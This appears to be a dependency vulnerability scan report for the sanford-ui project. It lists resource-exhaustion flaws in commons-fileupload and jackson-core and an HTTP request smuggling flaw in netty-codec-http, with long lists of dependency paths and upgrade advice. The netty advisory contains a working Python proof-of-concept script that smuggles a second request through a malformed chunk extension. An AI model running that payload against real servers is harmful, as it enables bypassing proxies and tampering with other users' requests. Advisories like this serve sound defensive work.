Vulnerabilities

 4 via 153 paths

Dependencies

 179

Source

 GitHub

Commit

 6e9f180c

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 4
  • 2
Severity
  • 3
  • 2
  • 1
Status
  • 6
  • 0
  • 0

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: commons-fileupload:commons-fileupload
  • Introduced through: org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-openfeign-core@5.0.1 io.github.openfeign:feign-form-spring@13.6 commons-fileupload:commons-fileupload@1.5

Overview

commons-fileupload:commons-fileupload is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when processing multipart headers. An attacker can exhaust system resources by sending malicious requests with excessively large individual multipart headers.

Remediation

Upgrade commons-fileupload:commons-fileupload to version 1.6.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http@4.2.10.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http2@4.2.10.Final io.netty:netty-codec-http@4.2.10.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 io.projectreactor.netty:reactor-netty-http@1.3.4 io.netty:netty-codec-http3@4.2.10.Final io.netty:netty-codec-http@4.2.10.Final
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-reactor-netty@4.1.0-M4 org.springframework.boot:spring-boot-reactor-netty@4.1.0-M4 io.projectreactor.netty:reactor-netty-http@1.3.4 io.projectreactor.netty:reactor-netty-core@1.3.4 io.netty:netty-handler-proxy@4.2.10.Final io.netty:netty-codec-http@4.2.10.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling in the parsing of quoted strings within chunked transfer encoding extension values. An attacker can inject arbitrary HTTP requests into a connection by crafting chunk extensions containing carriage return or line feed bytes, leading to parsing discrepancies between the server and RFC-compliant intermediaries.

PoC

#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.12.Final or higher.

References

HTTP Request Smuggling vulnerability report

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: com.vaadin:vaadin-spring-boot-starter@25.1.1 and org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4

Detailed paths

  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-spring@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-spring@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.boot:spring-boot-starter-webflux@4.1.0-M4 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-jackson@4.1.0-M4 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 org.springframework.boot:spring-boot-jackson@4.1.0-M4 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-dnd@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-lit-template@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-react@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-dnd@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-lit-template@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-react@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-confirm-dialog-flow@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-confirm-dialog-flow@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-databind@3.1.0 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:flow-html-components@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-details-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-messages-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-button-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-upload-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ai-components-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-app-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-avatar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-badge-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-card-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-checkbox-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-combo-box-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-confirm-dialog-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-context-menu-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-custom-field-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-date-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-time-picker-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-dialog-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-form-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-grid-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-icons-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-lumo-theme@25.1.1 com.vaadin:vaadin-icons-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-list-box-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-login-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-markdown-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-master-detail-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-menu-bar-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-notification-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-ordered-layout-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 com.vaadin:vaadin-core@25.1.1 com.vaadin:vaadin-core-internal@25.1.1 com.vaadin:vaadin-core-components@25.1.1 com.vaadin:vaadin-popover-flow@25.1.1 com.vaadin:vaadin-flow-components-base@25.1.1 com.vaadin:flow-data@25.1.1 com.vaadin:flow-server@25.1.1 tools.jackson.core:jackson-core@3.1.0
